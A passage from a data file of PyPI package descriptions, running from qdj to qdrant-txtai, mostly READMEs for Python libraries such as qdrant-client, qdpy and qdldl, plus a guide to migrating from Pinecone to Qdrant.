django_version }}\"Start a new project using our template:# cd /tmp# qdj start myprojectShow the created files:# find myprojectmyprojectmyproject/requirements.txtmyproject/settings.pymyproject/manage.pymyproject/urls.pymyproject/__init__.py"} +{"package": "qdjarv", "pacakge-description": "Quick and dirty jsonapi response validatorA library for validating jsonapi responses and simplifying their handling.What it does:Validates that types have the fields you want, of the type you want.Links resources together.Validates that resources you wanted included, are included.Pulls up relationships and attributes one level up, to resource object level.What it doesn't do:Validate that response is valid jsonapi. 
Use jsonapi's jsonschema.Build requests or handle http codes.ORM.UsageHere's example usage:# Start by defining your typesfromqdjarvimportValidator,Type,Rel,ValidationError# Field value can be any callable that either returns a validated value or# throws.defType(t):defv(o):ifisinstance(o,t):raiseValidationErrorreturnoreturnvtypes={\"articles\":{\"title\":Type(str),\"author\":Rel(\"people\"),# One-to-one relation.\"comments\":Rel([\"comments\"]),# One-to-many relation.},\"people\":{\"firstName\":Type(str),\"lastName\":Type(str),\"weight\":Type([int])},\"comments\":{\"body\":Type(str),\"author\":Rel(\"people\")}}# If you're using sparse fields, define those, too.fields={\"articles\":[\"title\",\"author\"],\"people\":[\"firstName\",\"lastName\"]}# If you're using includes, also define them.# This is equivalent to 'author,author.comments'.include={\"author\":{\"comments\":{}}}# Also declare your toplevel type.top=[\"articles\"]# This is a list, single element would be just \"articles\".# Finally, create a validator.p=Validator(top,types,include=include,fields=fields)# Parsing modifies the received message, so make a copy if you want the# original!# Also remember to pass the message through jsonapi jsonschema first.# If something goes wrong, it will throw a qdjarv.ValidationError.parsed=p.validate(message)# If you don't feel like repeating yourself, you can get your get parameters# like so:fields_args=p.fields_args()include_args=p.include_args()Here's an example parsed message:{# Other toplevel stuff skipped for brevity.\"data\":[{\"type\":\"articles\",\"id\":\"1\",# Relationships and attributes were pulled out to this level.# You might want to access links and meta (and maybe# relationships / attributes), so they're kept with a dot# prepended.\".links\":{},\".meta\":{# ...}\".relationships\":{# ...}\".attributes\":{# ...},\"title\":\"JSON:API paints my bikeshed!\"\"author\":{\"links\":{# ...},\"data\":{# If this resource was included, we replaced the binding# with the object itself.# Watch out for loops!\"type\":\"people\",\"id\":\"9\",\".attributes\":{# ...},\".links\":{# ...},\"firstName\":\"Dan\",\"lastName\":\"Gebhardt\",\"twitter\":\"dgeb\"}},\"comments\":{# ...},}],\"included\":[# Included objects are still here, in case you wanted them. Also linked# and flattened.{\"type\":\"people\",\"id\":\"9\",# ...},# ...]}TODOTests.Turning types into requests, maybe."} +{"package": "qdk", "pacakge-description": "qdk.chemistry[!WARNING]This qdk.chemistry package is deprecated. 
Please seeAzure Quantum Elementsfor Azure Quantum's latest efforts in chemistry.Q# chemistry library's Python application layer, contains tools for creating 2D molecular diagrams and calculating their 3D geometry using RDKit.Installation and getting startedWe recommend installingAnacondaorMiniconda.First, install RDKit:condainstall-cconda-forgerdkitTo install theqdkpackage, runpipinstallqdkDevelopmentTo install the package in development mode, we recommend creating a new environment using the following command:# Create new conda environmentcondaenvcreate-fqdk/environment.ymlThen, the package can be installed after activating the environment:# Activate conda environmentcondaactivateqdk# Install package in development modepipinstall-eqdk"} +{"package": "qdk-sim-experimental", "pacakge-description": "No description available on PyPI."} +{"package": "qdl", "pacakge-description": "No description available on PyPI."} +{"package": "qdldl", "pacakge-description": "qdldl-pythonPython interface to theQDLDLfree LDL factorization routine for quasi-definite linear systems:Ax = b.InstallationThis package can be directly installed via pip,pip install qdldlUsageInitialize the factorization withimport qdldl\nF = qdldl.Solver(A)whereAmust be a square quasi-definite matrix inscipy sparse CSC\nformat.The algorithm internally converts the matrix into upper triangular format. IfAis already upper-triangular, you can specify it with the argumentupper=Trueto theqdldl.Solverconstructor.To solve the linear system for a right-hand sideb, just writex = F.solve(b)To update the factorization without changing the sparsity pattern ofAyou can runF.update(A_new)whereA_newis a sparse matrix in CSR format with the same sparsity pattern asA.The algorithm internally convertsA_newinto upper triangular format. IfA_newis already upper-triangular, you can specify it with the argumentupper=Trueto theF.updatefunction."} +{"package": "qdls", "pacakge-description": "qdls"} +{"package": "qdmap", "pacakge-description": "qdmapA python package for explosives safety quantity-distance spatial analysis.Free software: MIT licenseDocumentation:https://josh-spatial.github.io/qdmapFeaturesIN-PROGRESS Create a basic quantity-distance calculatorFirst injupyter notebookTODO Create QGIS PluginTODO Determine database type to use as a basis (PostGIS, GeoPackage, shapefiles?)TODO Create UI for pluginTODO Write spatial analysis (GeoPandas)CreditsThis package was created withCookiecutterand thegiswqs/pypackageproject template."} +{"package": "qdns", "pacakge-description": "# qdns\nA threaded DNS resolver for Python"} +{"package": "qdo", "pacakge-description": "qdo: Python worker library for Mozilla Services\u2019 message queuingqdopronouncedqu-doeThis is a Python implementation of a worker library used for processing\nqueued messages from a Mozilla Services message queue. The message queue is\ncalledQueueyand is implemented as aPyramidbased web service on top ofCassandra.DocumentationYou can read the documentation athttp://qdo.readthedocs.org/Changelog0.1 (2012-09-17)Initial release and feature scope."} +{"package": "qdollar", "pacakge-description": "qdollarqdollaris a python implementation of the$Q Super-Quick Recognizer.AboutThe $Q Super-Quick Recognizer is a 2-D gesture recognizer designed for rapid prototyping of gesture-based user interfaces, especially on low-power mobiles and wearables. It builds upon the $P Point-Cloud Recognizer but optimizes it to achieve a whopping 142\u00c3\u2014 speedup, even while improving its accuracy slightly. 
$Q is currently the most performant recognizer in the $-family. Despite being incredibly fast, it is still fundamentally simple, easy to implement, and requires minimal lines of code. Like all members of the $-family, $Q is ideal for people wishing to add stroke-gesture recognition to their projects, now blazing fast even on low-capability devices.InstallationTo installqdollarusing pippip install qdollarExamplefromqdollar.recognizerimportGesture,Recognizer,Pointt1=[Point(0,0,1),Point(1,1,1),Point(0,1,2),Point(1,0,2)]tmpl_1=Gesture('X',t1)tmpl_2=Gesture('line',[Point(0,0),Point(1,0)])templates=[tmpl_1,tmpl_2]gesture=Gesture('A',[Point(31,141,1),Point(109,222,1),Point(22,219,2),Point(113,146,2)])res=Recognizer().classify(gesture,templates)print(res[0].name)"} +{"package": "qdownloader", "pacakge-description": "No description available on PyPI."} +{"package": "qd-plot", "pacakge-description": "qdquick-draw: a cli plotting toolqdis a command line tool to quickly make plots from csv and json files or\nstreams. It is built on top of thepandasandplotlylibraries.Installation and usageqdcan be installed viapip install qd-plot. It requires Python 3.7+.Basic usageMake a quick plot using the first columns available and display the output in a gui\n(default web browser).catdata/trig.json|qd--guiBy defaultqdreads data fromstdinand writes image bytes tostdout, however it\nalso accepts input and output files as arguments, as well as the--guioption shown\nabove.qd-idata/trig.json-otrig.pngAll the cli functionality available can be seen via the--helpoption.qd--helpMacOS + iTerm2Sinceqdwrites to stdout by default, the images can be displayed right in the\nterminal window if using a compatible terminal, such as iTerm2 withimgcat:catdata/trig.json|qd|imgcatMore examplesMean in binsPlot the mean values in some bins specifying the x and y columns.catdata/trig.json|qd-xx-ysin,cos--mean--guiPercentile in binsPlot the 95th percentile values in 20 binscatdata/trig.json|qd-xx-ysin--quant-q95--nbins20--guiHistogram of valuesMake a histogram from two sets of data using 20 bins.catdata/dists.csv|qd-xgauss,expo--hist-n20--guiLocal DevelopmentClone this repo from github and in a virtual environment do the following:pipinstall.# installs qd based on local code changespipinstall-rrequirements-dev.txt# installs extra packages for dev and testingTests can be run via:pytest-n4"} +{"package": "qdpxlib", "pacakge-description": "qdpxlibThis isqdpxlib, a Python API for easy handling (importing and exporting) of QDPX (MAXQDA) files.InstallationYou can installqdpxlibusing pip:pipinstallqdpxlibUsageHere's a simple example of how to useqdpxlib:importjsonfromqdpxlibimportQDPXFileqdpx_file='path/to/qdpxfile.qdpx'output_json='output.json'output_qdpx='new_qdpx.qdpx'qdpx=QDPXFile(qdpx_file)# Export them as JSONwithopen(output_json,'w')asf:json.dump(qdpx.codings,f,indent=4)# Export new qdpx fileqdpx.export_qdpx(qdpx_file,output_qdpx)ContributingContributions are welcome! Please reach out tooyonay12@tamu.eduor make a pull request to contribute. We will post more detailed contribution guidelines soon.LicenseThis project is licensed under the MIT license."} +{"package": "qdpy", "pacakge-description": "Packageqdpyimplements recent Quality-Diversity algorithms: Map-Elites, CVT-Map-Elites, NSLC, SAIL, etc.\nQD algorithms can be accessed directly, butqdpyalso includes building blocks that can be easily assembled together to build your own QD algorithms. 
It can be used with parallelism mechanisms and in distributed environments.This package requires Python 3.6+.qdpyincludes the following features:Generic support for diverse Containers: Grids, Novelty-Archives, Populations, etcOptimisation algorithms for QD: random search methods, quasi-random methods, evolutionary algorithmsSupport for multi-objective optimisation methodsPossible to use optimisation methods not designed for QD, such as [CMA-ES](https://arxiv.org/pdf/1604.00772.pdf)Parallelisation of evaluations, using parallelism libraries, such as multiprocessing, concurrent.futures or [SCOOP](https://github.com/soravux/scoop)Easy integration with the popular [DEAP](https://github.com/DEAP/deap) evolutionary computation frameworkInstallqdpyrequires Python 3.6+. It can be installed with:pip3 install qdpyqdpyincludes optional features that need extra packages to be installed:cmafor CMA-ES supportdeapto integrate with the DEAP librarytablesto output results files in the HDF5 formattqdmto display a progress bar showing optimisation progresscoloramato add colours to pretty-printed outputsYou can installqdpyand all of these optional dependencies with:pip3 install qdpy[all]The latest version can be installed from the GitLab repository:pip3 install git+https://gitlab.com/leo.cazenille/qdpy.git@masterExampleFrom a python shell:from qdpy import algorithms, containers, benchmarks, plots\n\n# Create container and algorithm. Here we use MAP-Elites, by illuminating a Grid container by evolution.\ngrid = containers.Grid(shape=(64,64), max_items_per_bin=1, fitness_domain=((0., 1.),), features_domain=((0., 1.), (0., 1.)))\nalgo = algorithms.RandomSearchMutPolyBounded(grid, budget=60000, batch_size=500,\n dimension=3, optimisation_task=\"maximisation\")\n\n# Create a logger to pretty-print everything and generate output data files\nlogger = algorithms.AlgorithmLogger(algo)\n\n# Define evaluation function\neval_fn = algorithms.partial(benchmarks.illumination_rastrigin_normalised,\n nb_features = len(grid.shape))\n\n# Run illumination process !\nbest = algo.optimise(eval_fn)\n\n# Print results info\nprint(algo.summary())\n\n# Plot the results\nplots.default_plots_grid(logger)\n\nprint(\"All results are available in the '%s' pickle file.\" % logger.final_filename)Usage, DocumentationPlease to go the GitLab repository main page (https://gitlab.com/leo.cazenille/qdpy) and the documentation main page (https://leo.cazenille.gitlab.io/qdpy/).Author:Leo Cazenille, 2018-*License:LGPLv3, see LICENSE file."} +{"package": "qdrant", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qdrant-client", "pacakge-description": "Python Client library for theQdrantvector search engine.Python Qdrant ClientClient library and SDK for theQdrantvector search engine. Python Client API Documentation is availablehere.Library contains type definitions for all Qdrant API and allows to make both Sync and Async requests.Client allows calls for allQdrant API methodsdirectly.\nIt also provides some additional helper methods for frequently required operations, e.g. 
initial collection uploading.SeeQuickStartfor more details!Installationpip install qdrant-clientFeaturesType hints for all API methodsLocal mode - use same API without running serverREST and gRPC supportMinimal dependenciesExtensive Test CoverageLocal modePython client allows you to run same code in local mode without running Qdrant server.Simply initialize client like this:fromqdrant_clientimportQdrantClientclient=QdrantClient(\":memory:\")# orclient=QdrantClient(path=\"path/to/db\")# Persists changes to diskLocal mode is useful for development, prototyping and testing.You can use it to run tests in your CI/CD pipeline.Run it in Colab or Jupyter Notebook, no extra dependencies required. See anexampleWhen you need to scale, simply switch to server mode.Fast Embeddings + Simpler APIpip install qdrant-client[fastembed]FastEmbed is a library for creating fast vector embeddings on CPU. It is based on ONNX Runtime and allows to run inference on CPU with GPU-like performance.Qdrant Client can use FastEmbed to create embeddings and upload them to Qdrant. This allows to simplify API and make it more intuitive.fromqdrant_clientimportQdrantClient# Initialize the clientclient=QdrantClient(\":memory:\")# or QdrantClient(path=\"path/to/db\")# Prepare your documents, metadata, and IDsdocs=[\"Qdrant has Langchain integrations\",\"Qdrant also has Llama Index integrations\"]metadata=[{\"source\":\"Langchain-docs\"},{\"source\":\"Linkedin-docs\"},]ids=[42,2]# Use the new add methodclient.add(collection_name=\"demo_collection\",documents=docs,metadata=metadata,ids=ids)search_result=client.query(collection_name=\"demo_collection\",query_text=\"This is a query document\")print(search_result)Connect to Qdrant serverTo connect to Qdrant server, simply specify host and port:fromqdrant_clientimportQdrantClientclient=QdrantClient(host=\"localhost\",port=6333)# orclient=QdrantClient(url=\"http://localhost:6333\")You can run Qdrant server locally with docker:dockerrun-p6333:6333qdrant/qdrant:latestSee more launch options inQdrant repository.Connect to Qdrant cloudYou can register and useQdrant Cloudto get a free tier account with 1GB RAM.Once you have your cluster and API key, you can connect to it like this:fromqdrant_clientimportQdrantClientqdrant_client=QdrantClient(url=\"https://xxxxxx-xxxxx-xxxxx-xxxx-xxxxxxxxx.us-east.aws.cloud.qdrant.io:6333\",api_key=\"\",)ExamplesCreate a new collectionfromqdrant_client.modelsimportDistance,VectorParamsclient.recreate_collection(collection_name=\"my_collection\",vectors_config=VectorParams(size=100,distance=Distance.COSINE),)Insert vectors into a collectionimportnumpyasnpfromqdrant_client.modelsimportPointStructvectors=np.random.rand(100,100)client.upsert(collection_name=\"my_collection\",points=[PointStruct(id=idx,vector=vector.tolist(),payload={\"color\":\"red\",\"rand_number\":idx%10})foridx,vectorinenumerate(vectors)])Search for similar vectorsquery_vector=np.random.rand(100)hits=client.search(collection_name=\"my_collection\",query_vector=query_vector,limit=5# Return 5 closest points)Search for similar vectors with filtering conditionfromqdrant_client.modelsimportFilter,FieldCondition,Rangehits=client.search(collection_name=\"my_collection\",query_vector=query_vector,query_filter=Filter(must=[# These conditions are required for search resultsFieldCondition(key='rand_number',# Condition based on values of `rand_number` field.range=Range(gte=3# Select only those results where `rand_number` >= 3))]),limit=5# Return 5 closest points)See more examples in 
ourDocumentation!gRPCTo enable (typically, much faster) collection uploading with gRPC, use the following initialization:fromqdrant_clientimportQdrantClientclient=QdrantClient(host=\"localhost\",grpc_port=6334,prefer_grpc=True)Async clientStarting from version 1.6.1, all python client methods are available in async version.To use it, just importAsyncQdrantClientinstead ofQdrantClient:fromqdrant_clientimportAsyncQdrantClient,modelsimportnumpyasnpimportasyncioasyncdefmain():# Your async code using QdrantClient might be put hereclient=AsyncQdrantClient(url=\"http://localhost:6333\")awaitclient.create_collection(collection_name=\"my_collection\",vectors_config=models.VectorParams(size=10,distance=models.Distance.COSINE),)awaitclient.upsert(collection_name=\"my_collection\",points=[models.PointStruct(id=i,vector=np.random.rand(10).tolist(),)foriinrange(100)],)res=awaitclient.search(collection_name=\"my_collection\",query_vector=np.random.rand(10).tolist(),# type: ignorelimit=10,)print(res)asyncio.run(main())Both, gRPC and REST API are supported in async mode.\nMore examples can be foundhere.DevelopmentThis project uses git hooks to run code formatters.Installpre-commitwithpip3 install pre-commitand set up hooks withpre-commit install.pre-commit requires python>=3.8"} +{"package": "qdrant-haystack", "pacakge-description": "qdrant-haystackTable of ContentsInstallationLicenseInstallationpip install qdrant-haystackTestingThe test suites use Qdrant's in-memory instance. No additional steps required.hatch run testLicenseqdrant-haystackis distributed under the terms of theApache-2.0license."} +{"package": "qdrant-openapi", "pacakge-description": "API description for Qdrant vector search engine. This document describes CRUD and search operations on collections of points (vectors with payload). Qdrant supports any combinations of `should`, `must` and `must_not` conditions, which makes it possible to use in applications when object could not be described solely by vector. It could be location features, availability flags, and other custom properties businesses should take into account. ## Examples This examples cover the most basic use-cases - collection creation and basic vector search. ### Create collection First - let's create a collection with dot-production metric. 
``` curl -X PUT 'http://localhost:6333/collections/test_collection' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "vectors": { "size": 4, "distance": "Dot" } }' ``` Expected response: ``` { "result": true, "status": "ok", "time": 0.031095451 } ``` We can ensure that collection was created: ``` curl 'http://localhost:6333/collections/test_collection' ``` Expected response: ``` { "result": { "status": "green", "vectors_count": 0, "segments_count": 5, "disk_data_size": 0, "ram_data_size": 0, "config": { "params": { "vectors": { "size": 4, "distance": "Dot" } }, "hnsw_config": { "m": 16, "ef_construct": 100, "full_scan_threshold": 10000 }, "optimizer_config": { "deleted_threshold": 0.2, "vacuum_min_vector_number": 1000, "max_segment_number": 5, "memmap_threshold": 50000, "indexing_threshold": 20000, "flush_interval_sec": 1 }, "wal_config": { "wal_capacity_mb": 32, "wal_segments_ahead": 0 } } }, "status": "ok", "time": 2.1199e-05 } ``` ### Add points Let's now add vectors with some payload: ``` curl -L -X PUT 'http://localhost:6333/collections/test_collection/points?wait=true' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "points": [ {"id": 1, "vector": [0.05, 0.61, 0.76, 0.74], "payload": {"city": "Berlin"}}, {"id": 2, "vector": [0.19, 0.81, 0.75, 0.11], "payload": {"city": ["Berlin", "London"] }}, {"id": 3, "vector": [0.36, 0.55, 0.47, 0.94], "payload": {"city": ["Berlin", "Moscow"] }}, {"id": 4, "vector": [0.18, 0.01, 0.85, 0.80], "payload": {"city": ["London", "Moscow"] }}, {"id": 5, "vector": [0.24, 0.18, 0.22, 0.44], "payload": {"count": [0]}}, {"id": 6, "vector": [0.35, 0.08, 0.11, 0.44]} ] }' ``` Expected response: ``` { "result": { "operation_id": 0, "status": "completed" }, "status": "ok", "time": 0.000206061 } ``` ### Search with filtering Let's start with a basic request: ``` curl -L -X POST 'http://localhost:6333/collections/test_collection/points/search' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "vector": [0.2,0.1,0.9,0.7], "top": 3 }' ``` Expected response: ``` { "result": [ { "id": 4, "score": 1.362, "payload": null, "version": 0 }, { "id": 1, "score": 1.273, "payload": null, "version": 0 }, { "id": 3, "score": 1.208, "payload": null, "version": 0 } ], "status": "ok", "time": 0.000055785 } ``` But result is different if we add a filter: ``` curl -L -X POST 'http://localhost:6333/collections/test_collection/points/search' \\ -H 'Content-Type: application/json' \\ --data-raw '{ "filter": { "should": [ { "key": "city", "match": { "value": "London" } } ] }, "vector": [0.2, 0.1, 0.9, 0.7], "top": 3 }' ``` Expected response: ``` { "result": [ { "id": 4, "score": 1.362, "payload": null, "version": 0 }, { "id": 2, "score": 0.871, "payload": null, "version": 0 } ], "status": "ok", "time": 0.000093972 } ```"} +{"package": "qdrant-tools", "pacakge-description": "Migrating from Pinecone to Qdrant Vector Database: A Comprehensive GuideInstallationpipinstallqdrant-toolsUsagefromqdrant_tools.vectordbimportPineconeExport,QdrantImportindex_name=\"hindi-search\"# Existing Pinecone index name# Init Pineconepinecone_export=PineconeExport(index_name=index_name)vector_ids=[\"1\",\"2\",\"3\",\"4\",\"5\"]# Example vector idspoints_information=pinecone_export.fetch_vectors(vector_ids)print(points_information[\"ids\"],points_information[\"index_dimension\"])# Init Qdrantqdrant=QdrantImport(**points_information)qdrant.create_collection()qdrant.upsert_vectors()# Trying it out!response=qdrant.qdrant_client.search(collection_name=index_name,query_vector=# vector to search of 
same dimension as other vectors,)print(response)IntroductionAre you considering a transition from Pinecone to Qdrant? If so, this article will guide you through the process, outlining the similarities and differences between the two systems, and providing a step-by-step migration plan.Understanding the TerminologyBefore diving into the migration process, it's important to familiarize yourself with some key terms.Pinecone TerminologyCollection: A collection in Pinecone is a static snapshot of the index, signifying a unique set of vectors with attached metadata. Qdrant also has a similar concept, referred to as a collection.Index: An index in Pinecone is the principal organizational unit for vector data. It receives and stores vectors, provides query services, and performs various vector operations. It's similar to the concept of an index in Qdrant.Pods: Pinecone uses pods, which are pre-configured hardware units, to host and execute its services. More pods typically result in greater storage capacity, reduced latency, and improved throughput. The Qdrant equivalent is yet to be determined.Qdrant TerminologyCollection: A collection in Qdrant is a named set of points, where each point is a vector with an associated payload. The concept is similar to a collection in Pinecone.Payload: Qdrant allows additional information to be stored with vectors, referred to as a payload. This corresponds to the concept of associated metadata in Pinecone.Points: A point in Qdrant is a record composed of a vector and an optional payload, which closely corresponds to the concept of vectors in Pinecone.To help visualize these concepts, here is a comparison table:Vector DatabasePineconeQdrantDB Capacity/PerfPodClusterCollectionSnapshot of the IndexNamed set of pointsIndexIndexCollectionVectorVectorPointMetadataMetadataPayloadNamespaceOne namespace per vectorNone. However, indexing is possibleSize40KB metadata limitNo default. Size can be set during collection creation/updation for vectors. No payload limitPlanning Your MigrationMigrating from Pinecone to Qdrant involves a series of well-planned steps to ensure that the transition is smooth and disruption-free. Here is a suggested migration plan:Understanding Qdrant(1 week): It's important to first get a solid grasp of Qdrant, its functions, and its APIs. Take time to understand how to establish collections, add points, and query these collections.Migration strategy(2 weeks): Create a comprehensive migration strategy, incorporating data migration (copying your vectors and associated metadata from Pinecone to Qdrant), feature migration (verifying the availability and setting up of features currently in use with Pinecone in Qdrant), and a contingency plan (should there be any unexpected issues).Establishing a parallel Qdrant system(1 week): Set up a Qdrant system to run concurrently with your current Pinecone system. This step will let you begin testing Qdrant without disturbing your ongoing operations on Pinecone.Data migration(2-3 weeks): Shift your vectors and metadata from Pinecone to Qdrant. The timeline for this step could vary, depending on the size of your data and Pinecone API's rate limitations.Testing and transition(2 weeks): Following the data migration, thoroughly test the Qdrant system. Once you're assured of the Qdrant system's stability and performance, you can make the switch.Monitoring and fine-tuning(ongoing): After transitioning to Qdrant, maintain a close watch on its performance. 
It's key to continue refining the system for optimal results as needed.Bear in mind, these are just rough timelines, and the actual time taken can vary based on the specifics of your setup and the complexity of the migration.Streamlining Data and Embedding MigrationCopying vectors and metadata from your existing Pinecone index is achievable with the fetch operation in Pinecone. This operation retrieves vectors by their ID from the index, bringing along their vector data and/or metadata. Typically, the fetch latency falls below 5ms (source).On the other hand, Qdrant organizes its data into collections. Each collection is a named set of points - vectors coupled with a payload - which can be queried. The vectors in a collection share the same dimensionality and are compared using a single metric (source).fromqdrant_clientimportQdrantClientfromqdrant_client.modelsimportDistance,VectorParamsclient=QdrantClient(host=\"localhost\",port=6333)client.recreate_collection(collection_name=\"my_collection\",vectors_config=VectorParams(size=100,distance=Distance.COSINE),)The migration from Pinecone to Qdrant involves a two-step process of exporting data from Pinecone and subsequently importing that data into Qdrant.Navigating Pinecone Export RestrictionsData extraction from Pinecone must adhere to certain restrictions:Queries: For the parametertop_k, denoting the number of results to return, the maximum value is 10,000. However, if the optionsinclude_metadata=Trueorinclude_data=Trueare utilized, thetop_kvalue reduces to a maximum of 1,000.Fetch and Delete: The ceiling for the number of vectors per fetch or delete request is 1,000.Metadata: The upper limit for metadata size per vector is 40 KB. Pinecone does not support null metadata values, and metadata exhibiting high cardinality may cause the pods to reach capacity.Onboarding Data into QdrantIn Qdrant, data is expected in float format. The process of importing data into Qdrant involves the creation of a collection and then indexing the data, described in the steps below:Creating a Collection: In Qdrant, a collection is a named set of points (vectors with a payload) among which you can search. All vectors within a collection should share the same dimensionality and be comparable by a single metric.You can instantiate a collection by sending a PUT request to/collections/{collection_name}, furnished with necessary parameters including the collection name and the dimensions of vectors.Indexing Data: Once the collection is established, data can be indexed into it. This process can be streamlined by implementing a class likeSearchClient, that encompasses methods for data conversion, indexing, and searching. Theindexmethod within this class should prepare data in the required format and employ the Qdrant client'supsertfunction to index the data.Testing your applications post-migrationPost-migration, it is important to validate your applications with both Pinecone and Qdrant.For Qdrant, the following actions can help test your applications:Creating a Collection: This can be achieved using therecreate_collectionmethod, which sets up a collection with specified parameters such as vector size and distance metric.Inserting Vectors: Vectors can be inserted into your collection using theupsertmethod. Along with the vectors, you can also add associated metadata, referred to as payload in Qdrant.Querying Vectors: Thesearchmethod can be used to find similar vectors within the collection. 
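Putting the three testing steps above together, a minimal post-migration smoke test could look like the sketch below. This is an illustration only, not part of the original guide: it assumes the qdrant-client package and a locally running Qdrant instance, and the collection name, vector size and payload fields are made up for the example.

```python
# Hypothetical post-migration smoke test: create a collection, upsert a few
# points, then run a search. Collection name, vector size and payloads are
# illustrative only.
import random

from qdrant_client import QdrantClient
from qdrant_client.models import Distance, VectorParams, PointStruct

client = QdrantClient(host="localhost", port=6333)

# 1. Create (or re-create) a small test collection
client.recreate_collection(
    collection_name="migration_smoke_test",
    vectors_config=VectorParams(size=128, distance=Distance.COSINE),
)

# 2. Insert a handful of vectors with payloads (the Qdrant equivalent of metadata)
client.upsert(
    collection_name="migration_smoke_test",
    points=[
        PointStruct(
            id=i,
            vector=[random.random() for _ in range(128)],
            payload={"source": "pinecone", "original_id": str(i)},
        )
        for i in range(10)
    ],
)

# 3. Query the collection and check that results come back
hits = client.search(
    collection_name="migration_smoke_test",
    query_vector=[random.random() for _ in range(128)],
    limit=3,
)
assert len(hits) > 0, "expected at least one search result"
print(hits)
```

Running the same kind of check against the old Pinecone index and the new Qdrant collection side by side makes it easier to compare result quality before switching production traffic over.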
Qdrant also supports advanced queriesRemember, these are ideas that you can start with. Your actual testing scope may be larger based on the specifics of your application.Performance ConsiderationsCost and Network LatencyOne of the primary considerations when choosing a vector database system is cost and network latency.Pinecone recommends operating within known limits and deploying your application in the same region as your Pinecone service for optimal performance. For users on the Free plan, Pinecone runs in GCP US-West (Oregon).On the other hand, Qdrant is an open-source vector database that can be self-hosted, providing more flexibility. It can be deployed in your own environment, which can help optimize network latency and potentially lower costs.Throughput and SpeedPinecone suggests increasing the number of replicas for your index to increase throughput (QPS). It also provides a gRPC client that can offer higher upsert speeds for multi-pod indexes. However, be aware that reads and writes cannot be performed in parallel in Pinecone, which means that writing in large batches might affect query latencyQdrant, on the other hand, offers different performance profiles2based on your specific use case:Low memory footprint with high speed search: Qdrant achieves this by keeping vectors on disk and minimizing the number of disk reads. You can make this even better by configuring in-memory quantization, with on-disk original vectors.Vector quantization can be used to achieve this by converting vectors into a more compact representation, which can be stored in memory and used for search.Below is an example of how to configure this in Python:fromqdrant_clientimportQdrantClientfromqdrant_client.httpimportmodelsclient=QdrantClient(\"localhost\",port=6333)client.recreate_collection(collection_name=\"{collection_name}\",vectors_config=models.VectorParams(size=768,distance=models.Distance.COSINE),optimizers_config=models.OptimizersConfigDiff(memmap_threshold=20000),quantization_config=models.ScalarQuantization(scalar=models.ScalarQuantizationConfig(type=models.ScalarType.INT8,always_ram=True,),),)High precision with low memory footprint: For scenarios where high precision is required but RAM is limited, you can enable on-disk vectors and HNSW index. Here is an example of how to configure this in Python:fromqdrant_clientimportQdrantClient,modelsclient=QdrantClient(\"localhost\",port=6333)client.recreate_collection(collection_name=\"{collection_name}\",vectors_config=models.VectorParams(size=768,distance=models.Distance.COSINE),optimizers_config=models.OptimizersConfigDiff(memmap_threshold=20000),hnsw_config=models.HnswConfigDiff(on_disk=True))High precision with high speed search: If you want high speed and high precision search, Qdrant can achieve this by keeping as much data in RAM as possible and applying quantization with re-scoring. 
Here is an example of how to configure this in Python:fromqdrant_clientimportQdrantClientfromqdrant_client.httpimportmodelsclient=QdrantClient(\"localhost\",port=6333)client.recreate_collection(collection_name=\"{collection_name}\",vectors_config=models.VectorParams(size=768,distance=models.Distance.COSINE),optimizers_config=models.OptimizersConfigDiff(memmap_threshold=20000),quantization_config=models.ScalarQuantization(scalar=models.ScalarQuantizationConfig(type=models.ScalarType.INT8,always_ram=True,),),)There are also search/query time changes you can make to influence Qdrant's performance characteristics:fromqdrant_clientimportQdrantClient,modelsclient=QdrantClient(\"localhost\",port=6333)client.search(collection_name=\"{collection_name}\",search_params=models.SearchParams(hnsw_ef=128,exact=False),query_vector=[0.2,0.1,0.9,0.7],limit=3,)Overall, Qdrant's flexibility allows for a wide range of performance tuning options to suit various use cases, which could make it a better option for those looking for a customizable vector database.Please note that when tuning for performance, you must consider your specific use case, infrastructure, and workload characteristics. The suggested configurations are starting points and may need to be adjusted based on actual performance observations and requirements.PineconeHere are some tips for getting the best performance out ofPinecone.Security ConsiderationsQdrantQdrant takes a unique approach to security that is minimalist yet flexible, allowing for robust security configurations tailored to each unique deployment environment:Environment-level Security: Qdrant is designed to be deployed in secure environments, such as Kubernetes with Network Policies or a Virtual Private Cloud (VPC). This approach puts the control of security aspects in the hands of the deployer, allowing for custom security measures tailored to the specific needs of the deployment environment. If you're using Qdrant Cloud, it also uses API keys for authentication. Ensure these keys are securely managed.Data Encryption: While Qdrant does not support built-in data encryption, it leaves the choice of encryption strategy to the underlying storage service. This allows for a wide variety of encryption methods to be employed depending on the specific storage solution used, providing greater flexibility.Authentication: Qdrant's can be easily integrated with any existing authentication system at the service level, such as a reverse proxy. This allows for seamless integration with existing infrastructure without the need for modifications to accommodate a built-in authentication system.Network Security: Qdrant leaves network security to be handled at the environment level. 
This approach allows for a wide range of network security configurations to be employed depending on the specific needs of the deployment environment.Reporting Security Issues: Qdrant encourages the reporting of any security-related issues to their dedicated security email, demonstrating their commitment to ongoing security improvements.PineconeAuthentication: Pinecone requires a valid API key and environment pair for accessing its services, which can be a limiting factor if integration with an existing authentication system is desired.Data and Network Safeguards: Pinecone runs on a fully managed and secure AWS infrastructure, which may not provide the flexibility required for some deployment scenarios.Compliance and Certifications: While Pinecone's SOC2 Type II certification and GDPR-readiness are reassuring, they may not be sufficient for some organizations who want to work strictly within their VPC. This means deploying an on-premise of Pinecone under enterprise offering, which can be prohibitively expensive for some organizations.\u00dfSecurity Policies and Practices: Pinecone's rigorous security policies may not align with the security practices of all organizations. This also moves the burden of finding the difference between the security policies and ironing them out to the end user.Incident Management and Monitoring: Pinecone's incident management and monitoring practices are not integrated with the organisation's existing incident management and monitoring systems, potentially complicating incident response.In conclusion, Qdrant's minimalist approach to security allows for greater flexibility and customization according to the specific needs of the deployment environment. It puts the control of security measures in the hands of the deployer, allowing for robust, tailored security configurations. On the other hand, Pinecone's built-in security measures and compliance certifications provide a comprehensive, ready-to-use security solution that may not provide the same level of customization as Qdrant. The choice between the two depends largely on the specific security needs of your application and the flexibility of your deployment environment."} +{"package": "qdrant-txtai", "pacakge-description": "qdrant-txtaitxtaisimplifies building AI-powered semantic\nsearch applications using Transformers. It leverages the neural embeddings and\ntheir properties to encode high-dimensional data in a lower-dimensional space\nand allows to find similar objects based on their embeddings' proximity.Implementing such application in real-world use cases requires storing the\nembeddings in an efficient way though, namely in a vector 